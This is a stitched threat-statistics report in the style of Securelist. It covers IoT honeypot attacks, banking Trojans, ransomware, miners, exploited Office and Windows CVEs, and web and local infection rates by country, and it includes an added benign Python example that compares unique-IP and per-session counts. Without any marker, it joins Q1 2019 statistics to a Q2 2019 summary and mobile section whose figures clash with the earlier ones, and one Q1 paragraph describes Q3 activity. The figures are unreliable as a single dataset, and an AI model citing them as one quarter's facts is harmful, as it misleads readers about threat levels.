 * demon
 * hoho
 * hakai
 * satori
 * messiah
 * mips

Lastly, a few words about a miner with an old exploit for Oracle WebLogic Server, although it is not actually IoT malware, but a Trojan for Linux.

Taking advantage of the fact that WebLogic Server is cross-platform and can run on a Windows host or under Linux, the cybercriminals embedded checks for different operating systems, and are now attacking Windows hosts along with Linux ones.

[ (image)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22173014/it-threat-stats-q1-2019-7.png>)

_Section of code responsible for attacking Windows and Linux hosts_

### IoT threat statistics

Q1 demonstrated that there are still many devices in the world that attack each other through telnet. Note, however, that this has nothing to do with the qualities of the protocol. It is just that devices or servers managed through SSH are closely monitored by administrators and hosting companies, and any malicious activity is terminated. This is one reason why there are significantly fewer unique addresses attacking via SSH than there are IP addresses from which the telnet attacks come.
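The two measures contrasted in this section, distinct attacking addresses and sessions, worked through on constructed honeypot log lines as an added example (not Kaspersky's code; the one-line-per-connection log format is an assumption):

```python
"""Unique attacking IPs vs. sessions: two views of the same honeypot data.

Added example, not Kaspersky's code. The log format below is an assumption:
"<timestamp> <service> <source-ip> <event>", one line per connection (session).
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample log: a small crowd of telnet devices that each connect
# once or twice, and two SSH sources that keep reconnecting. Also one line for
# an unrelated service and one malformed line, both of which must be skipped.
SAMPLE_LOG = """\
2019-03-01T10:00:01Z telnet 203.0.113.10 login
2019-03-01T10:00:02Z telnet 203.0.113.11 login
2019-03-01T10:00:03Z telnet 203.0.113.12 login
2019-03-01T10:00:04Z telnet 203.0.113.13 login
2019-03-01T10:00:05Z telnet 203.0.113.14 login
2019-03-01T10:00:06Z telnet 203.0.113.15 login
2019-03-01T10:00:07Z telnet 203.0.113.16 login
2019-03-01T11:30:00Z telnet 203.0.113.10 login
2019-03-01T10:00:08Z ssh 198.51.100.7 login
2019-03-01T10:05:08Z ssh 198.51.100.7 login
2019-03-01T10:10:08Z ssh 198.51.100.7 login
2019-03-01T10:15:08Z ssh 198.51.100.7 login
2019-03-01T10:20:08Z ssh 198.51.100.7 login
2019-03-01T10:25:08Z ssh 198.51.100.7 login
2019-03-01T10:30:08Z ssh 198.51.100.7 login
2019-03-01T10:35:08Z ssh 198.51.100.7 login
2019-03-01T10:40:08Z ssh 198.51.100.7 login
2019-03-01T10:45:08Z ssh 198.51.100.7 login
2019-03-01T12:00:00Z ssh 198.51.100.8 login
2019-03-01T12:30:00Z ssh 198.51.100.8 login
2019-03-01T12:31:00Z http 198.51.100.9 probe
this line is deliberately malformed and must be skipped
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<service>telnet|ssh)\s+"
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<event>\S+)$"
)


@dataclass(frozen=True)
class Session:
    timestamp: str
    service: str
    source_ip: str
    event: str


def parse_log(text: str) -> list[Session]:
    """Keep telnet/SSH lines only; other services and garbage are dropped."""
    sessions = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            sessions.append(Session(m["ts"], m["service"], m["ip"], m["event"]))
    return sessions


def _percentages(counts: dict[str, int]) -> dict[str, float]:
    total = sum(counts.values())
    if total == 0:
        return {}
    return {svc: round(100.0 * n / total, 2) for svc, n in counts.items()}


def share_by_unique_ip(sessions: list[Session]) -> dict[str, float]:
    """Share per service by number of distinct attacking addresses.

    A device that hits the same service many times counts once, so a large
    population of infected telnet devices dominates this view.
    """
    ips: dict[str, set[str]] = defaultdict(set)
    for s in sessions:
        ips[s.service].add(s.source_ip)
    return _percentages({svc: len(v) for svc, v in ips.items()})


def share_by_session(sessions: list[Session]) -> dict[str, float]:
    """Share per service by number of sessions.

    A few servers that keep reconnecting over SSH can outweigh the telnet
    crowd here even though they are far fewer distinct addresses.
    """
    counts: dict[str, int] = defaultdict(int)
    for s in sessions:
        counts[s.service] += 1
    return _percentages(dict(counts))


def leader(shares: dict[str, float]) -> str:
    """Service with the largest share (empty string when there is no data)."""
    return max(shares, key=shares.get) if shares else ""


if __name__ == "__main__":
    parsed = parse_log(SAMPLE_LOG)
    for title, table in (("by unique IP", share_by_unique_ip(parsed)),
                         ("by session", share_by_session(parsed))):
        print(title)
        for svc, pct in sorted(table.items(), key=lambda kv: -kv[1]):
            print(f"  {svc:<7}{pct:6.2f}%")
```

On this input telnet leads by distinct addresses while SSH leads by sessions, the same inversion the two tables in this section show.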
| Service | Share |
|---|---|
| SSH | 17% |
| Telnet | 83% |

_Table of the popularity distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2019_

Nevertheless, cybercriminals are actively using powerful servers to manage their vast botnets. This is seen in the number of sessions in which cybercriminal servers interact with Kaspersky Lab's traps.

| Service | Share |
|---|---|
| SSH | 64% |
| Telnet | 36% |

_Table of distribution of cybercriminal working sessions with Kaspersky Lab's traps, Q1 2019_

If attackers have SSH access to an infected device, they have far greater scope to monetize the infection. In the overwhelming majority of cases involving intercepted sessions, we registered spam mailings, attempts to use our trap as a proxy server, and (least often of all) cryptocurrency mining.

### Telnet-based attacks

_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab's telnet traps, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171650/en-iot-telnet-map.png>)

**Top 10 countries where devices were located that carried out telnet-based attacks on Kaspersky Lab's traps**

| | Country | %* |
|---|---|---|
| 1 | Egypt | 13.46 |
| 2 | China | 13.19 |
| 3 | Brazil | 11.09 |
| 4 | Russia | 7.17 |
| 5 | Greece | 4.45 |
| 6 | Jordan | 4.14 |
| 7 | US | 4.12 |
| 8 | Iran | 3.24 |
| 9 | India | 3.14 |
| 10 | Turkey | 2.49 |

_* Infected devices in the country as a percentage of the total number of infected IoT devices attacking via telnet._

In Q1 2019, Egypt (13.46%) topped the leaderboard by number of unique IP addresses from which attempts were made to attack Kaspersky Lab's traps.
Second place by a small margin goes to China (13.19%), with Brazil (11.09%) in third.

Cybercriminals most often used telnet attacks to infect devices with one of the many Mirai family members.

**Top 10 malware downloaded to infected IoT devices following a successful telnet attack**

| | Verdict | %* |
|---|---|---|
| 1 | Backdoor.Linux.Mirai.b | 71.39 |
| 2 | Backdoor.Linux.Mirai.ba | 20.15 |
| 3 | Backdoor.Linux.Mirai.au | 4.85 |
| 4 | Backdoor.Linux.Mirai.c | 1.35 |
| 5 | Backdoor.Linux.Mirai.h | 1.23 |
| 6 | Backdoor.Linux.Mirai.bj | 0.72 |
| 7 | Trojan-Downloader.Shell.Agent.p | 0.06 |
| 8 | Backdoor.Linux.Hajime.b | 0.06 |
| 9 | Backdoor.Linux.Mirai.s | 0.06 |
| 10 | Backdoor.Linux.Gafgyt.bj | 0.04 |

_* Share of malware in the total amount of malware downloaded to IoT devices following a successful telnet attack._

It is worth noting that bots based on Mirai code make up most of the Top 10. There is nothing surprising about this, and the situation could persist for a long time given Mirai's universality.

### SSH-based attacks

_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab's SSH traps, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171814/en-iot-ssh-map.png>)

**Top 10 countries in which devices were located that carried out SSH-based attacks on Kaspersky Lab's traps**

| | Country | %* |
|---|---|---|
| 1 | China | 23.24 |
| 2 | US | 9.60 |
| 3 | Russia | 6.07 |
| 4 | Brazil | 5.31 |
| 5 | Germany | 4.20 |
| 6 | Vietnam | 4.11 |
| 7 | France | 3.88 |
| 8 | India | 3.55 |
| 9 | Egypt | 2.53 |
| 10 | Korea | 2.10 |

_* Infected devices in the country as a percentage of the total number of infected IoT devices attacking via SSH._

Most often, a successful SSH-based attack resulted in the following types of malware being downloaded to the victim's device: Backdoor.Perl.Shellbot.cd, Backdoor.Perl.Tsunami.gen, and Trojan-Downloader.Shell.Agent.p.

## Financial threats

### Quarterly highlights

The banker Trojan DanaBot, detected in [Q2](<https://securelist.com/it-threat-evolution-q2-2018-statistics/87170/>), continued to grow actively. The new modification not only updated the communication protocol with the C&C center, but also expanded the list of organizations targeted by the malware. Whereas last quarter the main targets were located in Australia and Poland, in Q3 organizations in Austria, Germany, and Italy were added.

Recall that DanaBot has a modular structure and can load additional plugins to intercept traffic, steal passwords, and hijack crypto wallets. The malware was distributed through spam mailings with a malicious office document, which was used to download the main body of the Trojan.

### Financial threat statistics

In Q1 2019, Kaspersky Lab solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 243,604 users.

_Number of unique users attacked by financial malware, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171934/en-finance.png>)

### Attack geography

To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.

_Geography of banking malware attacks, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/23125708/en-finance-map.png>)

#### Top 10 countries by share of attacked users

| Country* | %** |
|---|---|
| South Korea | 2.2 |
| China | 2.1 |
| Belarus | 1.6 |
| Venezuela | 1.6 |
| Serbia | 1.6 |
| Greece | 1.5 |
| Egypt | 1.4 |
| Pakistan | 1.3 |
| Cameroon | 1.3 |
| Zimbabwe | 1.3 |

_* Excluded are countries with relatively few Kaspersky Lab product users (under 10,000)._
_** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country._

### Top 10 banking malware families

| | Name | Verdicts | %* |
|---|---|---|---|
| 1 | RTM | Trojan-Banker.Win32.RTM | 27.42 |
| 2 | Zbot | Trojan.Win32.Zbot | 22.86 |
| 3 | Emotet | Backdoor.Win32.Emotet | 9.36 |
| 4 | Trickster | Trojan.Win32.Trickster | 6.57 |
| 5 | Nymaim | Trojan.Win32.Nymaim | 5.85 |
| 6 | Nimnul | Virus.Win32.Nimnul | 4.59 |
| 7 | SpyEye | Backdoor.Win32.SpyEye | 4.29 |
| 8 | Neurevt | Trojan.Win32.Neurevt | 3.56 |
| 9 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 2.64 |
| 10 | Tinba | Trojan-Banker.Win32.Tinba | 1.39 |

_* Unique users attacked by this malware as a percentage of all users attacked by financial malware._

In Q1 2019, the familiar Trojan-Banker.Win32.RTM (27.4%), Trojan.Win32.Zbot (22.9%), and Backdoor.Win32.Emotet (9.4%) made up the Top 3. In fourth place was Trojan.Win32.Trickster (6.6%), and fifth was Trojan.Win32.Nymaim (5.9%).

## Ransomware programs

### Quarterly highlights

The most high-profile event of the quarter was probably the [LockerGoga ransomware attack](<https://ics-cert.kaspersky.com/news/2019/03/22/metallurgical-giant-norsk-hydro-attacked-by-encrypting-malware/>) on several major companies. The ransomware code itself constitutes nothing new, but the large-scale infections attracted the attention of the media and the public. Such incidents yet again spotlight the issue of corporate and enterprise network security, because in the event of penetration, instead of using ransomware (which would immediately make itself felt), cybercriminals can install spyware and steal confidential data for years on end without being noticed.

A vulnerability was discovered in the popular WinRAR archiver that allows an arbitrary file to be placed in an arbitrary directory when unpacking an ACE archive.
The cybercriminals did not miss the chance to [assemble an archive](<https://www.bleepingcomputer.com/news/security/jneca-ransomware-spread-by-winrar-ace-exploit/>) that unpacks the executable file of the JNEC ransomware into the system autorun directory.

February saw [attacks](<https://www.bleepingcomputer.com/forums/t/691852/cr1ptt0r-ransomware-files-encrypted-readmetxt-support-topic/>) on network-attached storage (NAS) devices, in which Trojan-Ransom.Linux.Cryptor malware was installed on the victim device, encrypting data on all attached drives using elliptic-curve cryptography. Such attacks are especially dangerous because NAS devices are often used to store backup copies of data. What's more, the victim tends to be unaware that a separate device running Linux might be targeted by intruders.

Nomoreransom.org partners, in cooperation with cyber police, [created](<https://threatpost.com/gandcrab-decryptor-ransomware/141973/>) a utility for decrypting files impacted by GandCrab (Trojan-Ransom.Win32.GandCrypt) up to and including version 5.1. It helps victims of the ransomware restore access to their data without paying a ransom. Unfortunately, as is often the case, shortly after the public announcement, the cybercriminals updated the malware to version 5.2, which cannot be decrypted by this tool.

### Statistics

#### Number of new modifications

The number of new modifications fell markedly against Q4 2018, to the level of Q3.
Seven new families were identified in the collection.

_Number of new ransomware modifications, Q1 2018 – Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172044/ransomware-new-modification.png>)

#### Number of users attacked by ransomware Trojans

In Q1 2019, Kaspersky Lab products defeated ransomware attacks against 284,489 unique KSN users.

In February, the number of attacked users decreased slightly compared with January; however, by March we recorded a rise in cybercriminal activity.

_Number of unique users attacked by ransomware Trojans, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172107/en-ransomware-users.png>)

### Attack geography

_Geography of mobile ransomware Trojans, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171149/en-ransomware-map.png>)

#### Top 10 countries attacked by ransomware Trojans

| | Country* | % of users attacked by cryptors** |
|---|---|---|
| 1 | Bangladesh | 8.11 |
| 2 | Uzbekistan | 6.36 |
| 3 | Ethiopia | 2.61 |
| 4 | Mozambique | 2.28 |
| 5 | Nepal | 2.09 |
| 6 | Vietnam | 1.37 |
| 7 | Pakistan | 1.14 |
| 8 | Afghanistan | 1.13 |
| 9 | India | 1.11 |
| 10 | Indonesia | 1.07 |

_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000)._
_** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country._

#### Top 10 most common families of ransomware Trojans

| | Name | Verdicts* | Percentage of attacked users** |
|---|---|---|---|
| 1 | WannaCry | Trojan-Ransom.Win32.Wanna | 26.25 |
| 2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 18.98 |
| 3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 12.33 |
| 4 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 5.76 |
| 5 | Shade | Trojan-Ransom.Win32.Shade | 3.54 |
| 6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 3.50 |
| 7 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 2.82 |
| 8 | (generic verdict) | Trojan-Ransom.Win32.Gen | 2.02 |
| 9 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 1.51 |
| 10 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 1.20 |

_* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data._
_** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._

## Miners

### Statistics

#### Number of new modifications

In Q1 2019, Kaspersky Lab solutions detected 11,971 new modifications of miners.

_Number of new miner modifications, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172216/en-miners-modifications.png>)

#### Number of users attacked by miners

In Q1, we detected attacks using miners on the computers of 1,197,066 unique users of Kaspersky Lab products worldwide.

_Number of unique users attacked by miners, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172326/en-miners-users.png>)

### Attack geography

_Number of unique users attacked by miners, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/23131558/en-miner-map.png>)

#### Top 10 countries by share of users attacked by miners

| | Country* | %** |
|---|---|---|
| 1 | Afghanistan | 12.18 |
| 2 | Ethiopia | 10.02 |
| 3 | Uzbekistan | 7.97 |
| 4 | Kazakhstan | 5.84 |
| 5 | Tanzania | 4.73 |
| 6 | Ukraine | 4.28 |
| 7 | Mozambique | 4.17 |
| 8 | Belarus | 3.84 |
| 9 | Bolivia | 3.35 |
| 10 | Pakistan | 3.33 |

_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000)._
_** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky Lab products in the country._

## Vulnerable applications used by cybercriminals

Statistics for Q1 2019 show that vulnerabilities in Microsoft Office are still being used more often than those in other applications, due to their easy exploitability and highly reliable operation. The percentage of exploits for Microsoft Office did not change much compared to the previous quarter, amounting to 69%.

_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172438/exploits.png>)

This quarter's most popular vulnerabilities in the Microsoft Office suite were [CVE-2017-11882](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/17-year-old-ms-office-flaw-cve-2017-11882-actively-exploited-in-the-wild>) and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>). They relate to the Equation Editor component, and cause a buffer overflow with subsequent remote code execution.
Lagging behind the chart leaders by a factor of almost two is [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), a logic vulnerability and an analog of the no less popular [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>). Next comes [CVE-2017-8759](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>), where an error in the SOAP WSDL parser allowed malicious code to be injected and the computer to be infected. Microsoft Office vulnerabilities are overrepresented in the statistics partly due to the emergence of openly available generators of malicious documents that exploit these vulnerabilities.

In Q1, the share of detected vulnerabilities in browsers amounted to 14%, almost five times less than for Microsoft Office. Exploiting browser vulnerabilities is often difficult, since browser developers keep adding mitigations against certain classes of vulnerabilities, and bypassing them often requires chaining several vulnerabilities to achieve the objective, which significantly increases the cost of such attacks.

However, this does not mean that sophisticated attacks on browsers do not exist. A prime example is the actively exploited zero-day vulnerability [CVE-2019-5786](<https://securityaffairs.co/wordpress/82058/hacking/chrome-zero-day-cve-2019-5786.html>) in Google Chrome.
To bypass sandboxes, it was [used in conjunction](<https://www.zdnet.com/article/proof-of-concept-code-published-for-windows-7-zero-day/>) with an additional exploit for a vulnerability in the win32k.sys driver ([CVE-2019-0808](<https://securityaffairs.co/wordpress/82428/hacking/cve-2019-0808-win-flaw.html>)), with the targets being users of 32-bit versions of Windows 7.

It is fair to say that Q1 2019, like the quarter before it, was marked by a large number of targeted zero-day attacks. Kaspersky Lab researchers found an actively exploited zero-day vulnerability in the Windows kernel, which was assigned the ID [CVE-2019-0797](<https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/>). This vulnerability exploited race conditions caused by a lack of thread synchronization during undocumented system calls, resulting in a use-after-free. It is worth noting that [CVE-2019-0797](<https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/>) is the fourth zero-day vulnerability for Windows found by Kaspersky Lab in recent months.

A remarkable event at the beginning of the year was the discovery by researchers of the [CVE-2018-20250](<https://www.tenable.com/blog/winrar-absolute-path-traversal-vulnerability-leads-to-remote-code-execution-cve-2018-20250-0>) vulnerability, which had existed for 19 years in the module for unpacking ACE archives in the WinRAR utility. This component lacks sufficient checks of the file path, and a specially created ACE archive allows cybercriminals to place an executable file in the system autorun directory. The vulnerability was immediately used to start distributing malicious archives.

Despite the fact that two years have passed since the vulnerabilities in the FuzzBunch exploit kit (EternalBlue, EternalRomance, etc.) were patched, these attacks still occupy all the top positions in our statistics.
This is facilitated by the ongoing growth of malware that uses these exploits as a vector to spread inside corporate networks.

## Attacks via web resources

_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._

### Countries that are sources of web-based attacks

_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._

_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._

In Q1 2019, Kaspersky Lab solutions blocked **843,096,461** attacks launched from online resources located in 203 countries across the globe. **113,640,221** unique URLs were recognized as malicious by Web Anti-Virus components.

**_Distribution of web attack sources by country, Q1 2019_**[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172506/en-web-attack-source.png>)

This quarter, Web Anti-Virus was most active on resources located in the US.

### Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter.
The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

| | Country* | % of attacked users** |
|---|---|---|
| 1 | Venezuela | 29.76 |
| 2 | Algeria | 25.10 |
| 3 | Greece | 24.16 |
| 4 | Albania | 23.57 |
| 5 | Estonia | 20.27 |
| 6 | Moldova | 20.09 |
| 7 | Ukraine | 19.97 |
| 8 | Serbia | 19.61 |
| 9 | Poland | 18.89 |
| 10 | Kyrgyzstan | 18.36 |
| 11 | Azerbaijan | 18.28 |
| 12 | Belarus | 18.22 |
| 13 | Tunisia | 18.09 |
| 14 | Latvia | 17.62 |
| 15 | Hungary | 17.61 |
| 16 | Bangladesh | 17.17 |
| 17 | Lithuania | 16.71 |
| 18 | Djibouti | 16.66 |
| 19 | Reunion | 16.65 |
| 20 | Tajikistan | 16.61 |

_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000)._
_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._

These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data.

On average, 13.18% of Internet user computers worldwide experienced at least one **Malware-class** attack.

**_Geography of malicious web attacks in Q1 2019 (percentage of attacked users)_**[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172633/en-web-attacks-map.png>)

## Local threats

_Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._

_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera/phone memory cards, and external hard drives._

In Q1 2019, our File Anti-Virus detected **247,907,593** malicious and potentially unwanted objects.

### Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of users of Kaspersky Lab products on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

Note that as of this quarter, the rating includes only **Malware-class** attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

| | Country* | % of attacked users** |
|---|---|---|
| 1 | Uzbekistan | 57.73 |
| 2 | Yemen | 57.66 |
| 3 | Tajikistan | 56.35 |
| 4 | Afghanistan | 56.13 |
| 5 | Turkmenistan | 55.42 |
| 6 | Kyrgyzstan | 51.52 |
| 7 | Ethiopia | 49.21 |
| 8 | Syria | 47.64 |
| 9 | Iraq | 46.16 |
| 10 | Bangladesh | 45.86 |
| 11 | Sudan | 45.72 |
| 12 | Algeria | 45.35 |
| 13 | Laos | 44.99 |
| 14 | Venezuela | 44.14 |
| 15 | Mongolia | 43.90 |
| 16 | Myanmar | 43.72 |
| 17 | Libya | 43.30 |
| 18 | Bolivia | 43.17 |
| 19 | Belarus | 43.04 |
| 20 | Azerbaijan | 42.93 |

_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000)._
_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country._

These statistics are based on detection verdicts returned by the OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera/phone memory cards, or external hard drives.

On average, 23.62% of user computers globally faced at least one **Malware-class** local threat in Q1.

_Source: "IT threat evolution Q1 2019. Statistics", Securelist, published 2019-05-23, <https://securelist.com/it-threat-evolution-q1-2019-statistics/90916/>_

_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._

## Quarterly figures

According to Kaspersky Security Network,

 * Kaspersky solutions blocked 717,057,912 attacks launched from online resources in 203 countries across the globe.
 * 217,843,293 unique URLs triggered Web Anti-Virus components.
 * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 228,206 users.
 * Ransomware attacks were defeated on the computers of 232,292 unique users.
 * Our File Anti-Virus detected 240,754,063 unique malicious and potentially unwanted objects.
 * Kaspersky products for mobile devices detected:
   * 753,550 malicious installation packages
   * 13,899 installation packages for mobile banking Trojans
   * 23,294 installation packages for mobile ransomware Trojans

## Mobile threats

### Quarterly highlights

Q2 2019 will be remembered for several events.

First, we uncovered a large-scale [financial threat by the name of Riltok](<https://securelist.com/mobile-banker-riltok/91374/>), which targeted clients of not only major Russian banks, but some foreign ones too.

Second, we detected the new Trojan.AndroidOS.MobOk malware, tasked with stealing money from mobile accounts by exploiting WAP-Click subscriptions. After infection, web activity on the victim device went into overdrive. In particular, the Trojan opened specially created pages, bypassed their CAPTCHA system using a third-party service, and then clicked the necessary buttons to complete the subscription.

Third, we repeated our [study](<https://securelist.com/beware-of-stalkerware/90264/>) of commercial spyware, a.k.a. stalkerware. And although such software is not malicious in the common sense of the word, it does entail certain risks for victims. So as of April 3, 2019, Kaspersky mobile products for Android notify users of all known commercial spyware.

Fourth, we managed to discover a new type of adware app (AdWare.AndroidOS.KeepMusic.a and AdWare.AndroidOS.KeepMusic.b verdicts) that bypasses operating system restrictions on apps running in the background. To stop its thread being terminated, one such adware app launches a music player and plays a silent file. The operating system thinks that the user is listening to music, and does not end the process, which is not displayed on the main screen of the device. At this moment, the device is operating as part of a botnet, supposedly showing ads to the victim. "Supposedly" because ads are also shown in background mode, when the victim might not be using the device.

Fifth, our attention was caught by the Hideapp family of Trojans.
These Trojans spread very actively in Q2, including by means of a time-tested distribution mechanism: antivirus solution logos and porn apps.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153149/it-threat-evolution-q2-2019-statistics-1.png>)\n\nFinally, in some versions, the Trojan creators revealed a less-than-positive attitude to managers of one of Russia's largest IT companies:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153203/it-threat-evolution-q2-2019-statistics-2.png>)\n\n### Mobile threat statistics\n\nIn Q2 2019, Kaspersky detected 753,550 malicious installation packages, which is 151,624 fewer than in the previous quarter.\n\n_Number of detected malicious installation packages, Q3 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153226/it-threat-evolution-q2-2019-statistics-3.png>)\n\nWhat's more, this is almost 1 million fewer than the number of malicious installation packages detected in Q2 2018. Over the course of this year, we have seen a steady decline in the amount of new mobile malware. The drop is the result of less cybercriminal activity in adding members to the most common families. \n\n### Distribution of detected mobile apps by type\n\n_Distribution of newly detected mobile apps by type, Q1 and Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153256/it-threat-evolution-q2-2019-statistics-4.png>)\n\nAmong all the threats detected in Q2 2019, the lion's share went to potentially unsolicited RiskTool apps with 41.24%, which is 11 p.p. more than in the previous quarter. 
The malicious objects most frequently encountered came from the RiskTool.AndroidOS.Agent family (33.07% of all detected threats in this class), RiskTool.AndroidOS.Smssend (15.68%), and RiskTool.AndroidOS.Wapron (14.41%).\n\nIn second place are adware apps, their share having increased by 2.16 p.p. to 18.71% of all detected threats. Most often, adware belonged to the AdWare.AndroidOS.Ewind family (26.46% of all threats in this class), AdWare.AndroidOS.Agent (23.60%), and AdWare.AndroidOS.MobiDash (17.39%).\n\nTrojan-class malware (11.83%) took third place, with its share for the quarter climbing by 2.31 p.p. The majority of detected files belonged to the Trojan.AndroidOS.Boogr family (32.42%) \u2013 this verdict was given to Trojans detected with machine-learning tools. Next come the Trojan.AndroidOS.Hiddapp (24.18%), Trojan.AndroidOS.Agent (14.58%), and Trojan.AndroidOS.Piom (9.73%) families. Note that Agent and Piom are aggregating verdicts that cover a range of Trojan specimens from various developers.\n\nThreats in the Trojan-Dropper class (10.04%) declined noticeably, shedding 15 p.p. Most of the files we detected belonged to the Trojan-Dropper.AndroidOS.Wapnor family (71% of all detected threats in this class), while no other family claimed more than 3%. A typical member of the Wapnor family consists of a random pornographic image, a polymorphic dropper, and a unique executable file. The task of the malware is to sign the victim up to a WAP subscription.\n\nIn Q2 2019, the share of detected mobile bankers slightly decreased: 1.84% versus 3.21% in Q1. The drop is largely due to a decrease in the generation of Trojans in the [Asacub](<https://securelist.com/the-rise-of-mobile-banker-asacub/87591/>) family. 
